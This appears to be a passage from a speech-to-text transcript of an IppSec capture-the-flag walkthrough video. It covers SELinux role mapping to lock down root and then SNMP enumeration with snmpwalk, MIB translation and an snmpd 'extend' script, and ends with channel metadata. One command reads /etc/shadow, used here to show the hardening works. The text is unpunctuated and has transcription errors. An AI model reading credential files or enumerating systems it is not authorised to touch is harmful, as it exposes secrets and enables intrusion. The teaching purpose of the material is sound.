going to do sc manage modify dash s put them in the sys the root uh let's see sc manage do i do login modify there we go so if i do this se login dash l again root is now sysadm underscore u so if i do id z it's still unconfined but if i ssh back in please please please work i wonder if the file is not what oh come on did i just like brick something that's gonna suck uh let's see ls.ssh do i have an authorized key file i do so i don't think that's the problem log audit audit.log i should have just tailed come on yeah ctrl c oh god it won't let me control c um this audit log is huge and normally there we go grab deny on that log tail five how do i say normally i'd like kill that stage connection and go back in but i may have locked myself out what is this din transaction okay let's see what this is so uh where's that grab for this tail dash one audit to why it's probably just gonna be a te thing um oh so apparently sysadmins aren't allowed access to sshn by default so let's set this policy and come on boom there i go id z i am now assist admin if i cat etsy shadow permission denied and all is good in the world so i want to say that may be it actually no um sc manage export and we can see our sc linux config so we've set connect and connect db to zero um i don't know what this unified thing is we've enabled ssh says admin login we've set michelle to a user role we set root to assist admin role so yeah that is gonna be the box hope you guys enjoyed that and sorry if i said anything wrong with se linux um not an expert in it i actually bought a book that came yesterday obviously i can't read it all in one day but hopefully i'll know more about se linux can do a specific video on just se linux in general but yeah apologies for the sloppy cut after doing the video or xdf final we're talking and he got around the snmp taking three minutes to get uh code execution for the private by just calling the mib directly and turns out i've had instructions on how to do this as well but when i was creating the video i was too lazy just to go ipsec.rocks type in mibs and click on one of these videos to see how to make snmp walk readable long story short um you just run d package dash l to see if the snmp mibs downloader is installed we can see it is here i'd really like like last s to put it all in one line but we can see iii so it's installed if you want to install it you can just do sudo apt install and then snmp mibs downloader and we'll see it's already installed once it's installed you actually have to do a light configuration change because of weird licensing issues it's actually hilarious as snmp packages come without mid files due to license reasoning reasoning loading snmp mibs is disabled by default if you want to enable them just comment out this line and now when i run snmp walk everything is translated so we can see what things are which is handy so i'm just going to copy this to translated.out we'll call it snmp-translated and then i'm going to pause the video and we're just going to look over all of these actually something fun to do would be time here so if you put time before the program it'll tell you how long it took to run but yeah so be right back okay so we can see the snmp finished and it took two minutes and 44 seconds so the time command is pretty handy we look at snmp translated.out and we can see everything so if i do like search for html we can see uh the snb mib diskpath dot 2 is what wrote this path i'm not sure exactly what this is but now if i google it there's a chance it comes back i'm actually not sure um you got an oid reference and maybe it will be something it just says disk entry so i'm not sure exactly why that's there but it is this path where it's mounted is that a specific mount uh go here do i still have access if i do mount grab dub dub dub oh yeah so that is a specific mount so that is why it's showing up into the snmp library pretty cool um not i guess that was just done so it does that um well in actual production i've seen things like this like they have the data drive on a separate disk so when it comes to rebuild the application let's say you wanted to upgrade from ubuntu 16 to 18 if your web server is in a separate disk you just update the os and then mount the same disk with your web directory and you have a new os running the same exact website so in production environments you may see it it's kind of going away because of containerizations but that is a real world use case of doing something like that i guess um i'm gonna go back to less dash s and i know i'm running less and then piping it too less because i'm too lazy to go back and erase something but we can see the snmp extended mib is running the program so extended output and it starts at monitoring so if i just run this with um the extended objects the snmp walk it'll start there what i'm doing with this period is i'm just saying start at the parent and query everything but if i do net dash snmp extend mib ns extended or extend objects i think it will only run this and i guess because i'm curious and this video is already going longer than i expected let's dig into exactly how this happened in snmp i'm gonna guess it's an snmp directory if i look at snmpd.com i'm going to search this for monitor and there we go so this is why um in this configuration the extensible sections talks about how to run shell scripts extend monitoring and then user bin monitor so that's why this application is being executed every time and i'd often see people do things like this normally it doesn't like it's not coded poorly but a lot of health checking things just query the s mp of a box because it's normally read only so you can have some type of health check that says yes this application is running correctly put that in a bash script don't accept any input and then when the monitoring application hits snmp on their box it checks that mib and says yep everything is running good give it the green check mark and go on if that doesn't return what is expecting then it would go red send emails to people so it's an old way to do monitoring nowadays there's like zabbix or there used to be nagios that moved into zabx now nagios is still used but xavix is more popular and what that does is it has a little agent that generally runs on port 566 and it talks back to the agent the agent runs commands and gets the health check it kind of eliminated s mp but for devices like networking gear that doesn't run zabic's agents snmp is still used so these things come in handy hopefully that little rant improved this video and i didn't just waste your time but take care guys and i'll see you all next week

Info

Channel: IppSec

Views: 12,239

Rating: 4.9702234 out of 5

Keywords:

Id: IF5uhe1qR2I

Channel Id: undefined

Length: 87min 24sec (5244 seconds)

Published: Sat Sep 25 2021